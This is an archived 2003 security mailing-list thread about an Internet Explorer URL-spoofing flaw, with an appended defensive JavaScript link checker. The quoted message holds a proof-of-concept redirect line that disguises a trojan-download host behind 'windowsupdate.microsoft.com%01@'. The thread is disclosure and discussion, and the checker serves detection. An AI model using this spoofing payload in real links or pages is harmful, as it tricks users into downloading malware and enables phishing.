From: clint at secureconsulting.com (Clint Bodungen)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability

I don't really think it will make that much of a difference to their profits
considering anyone dumb enough to fall for those scams isn't going to know
the difference between an IP address in the URL box and a "spoofed" domain.
I had a client fall for an eBay scam and the end resulting domain in the URL
box was damn near www.robbingyoublinddamngringo.com.  I can see where a more
effective scam would be, like you hinted at, the infamous Microsoft security
update emails.


----- Original Message ----- 
From: "S G Masood" <sgmasood@...oo.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Tuesday, December 09, 2003 12:22 PM
Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing
vulnerability


>
> LOL. This is so simple and dangerous, it almost made
> me laugh and cry at the same time. Most of you will
> realise why...;D
> The Paypal, AOL, Visa, Mastercard, et al email
> scammers will have a harvest of gold this month with
> lots of zombies falling for this simple technique.
>
> ># POC ##########
> >http://www.zapthedingbat.com/security/ex01/vun1.htm
>
> Don't be surprised if your latest download from
> http://www.microsoft.com turns out to be a trojan!
>
>
> location.href=unescape('http://windowsupdate.microsoft.com%01@...edownloadaneviltrojanfromme.com');
>
>
> --
> S.G.Masood
>
> Hyderabad,
> India
>
> PS: One more thing - no scripting required to exploit this.
>
>
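Added example, not part of either message above: the URL pattern quoted in this thread puts a trusted-looking hostname in the userinfo position, before the "@", so a mail gateway or link checker can flag it by comparing the userinfo text with the host the URL actually resolves to. It assumes a WHATWG URL parser (Node.js or a current browser); inspectLink, safeDecode and the .example host are hypothetical names chosen for this sketch.

```javascript
// Added example: flag URLs whose userinfo part (the text before "@")
// can mislead a reader about the real destination host.
// Function names and sample hosts are constructed for illustration.

const CONTROL_CHARS = /[\u0000-\u001f\u007f]/;
const HOST_LIKE = /^[a-z0-9-]+(\.[a-z0-9-]+)+/i;

function safeDecode(s) {
  try {
    return decodeURIComponent(s);
  } catch {
    return s; // malformed escape: inspect the raw text instead
  }
}

function inspectLink(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return { host: null, userinfo: null, findings: ["unparseable"] };
  }
  const findings = [];
  const rawUserinfo = url.password
    ? `${url.username}:${url.password}`
    : url.username;
  const userinfo = safeDecode(rawUserinfo);
  if (rawUserinfo !== "") {
    findings.push("userinfo-present");
    // A dotted name before "@" reads like a hostname to a person.
    if (HOST_LIKE.test(userinfo)) findings.push("userinfo-looks-like-host");
    // Encoded control bytes such as %01 have no place in credentials.
    if (CONTROL_CHARS.test(userinfo)) findings.push("control-char-in-userinfo");
  }
  return { host: url.hostname, userinfo: rawUserinfo || null, findings };
}

// Constructed sample links; only the last one is clean.
const samples = [
  "http://windowsupdate.microsoft.com%01@other-host.example/update.exe",
  "http://www.paypal.com@203.0.113.7/login",
  "https://windowsupdate.microsoft.com/",
];
for (const s of samples) {
  const r = inspectLink(s);
  console.log(`${r.host}\t[${r.findings.join(", ")}]\t${s}`);
}
```

The host column is where the request really goes; a dotted username such as john.doe also triggers the host-like finding, so treat that one as a signal to review rather than a verdict.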

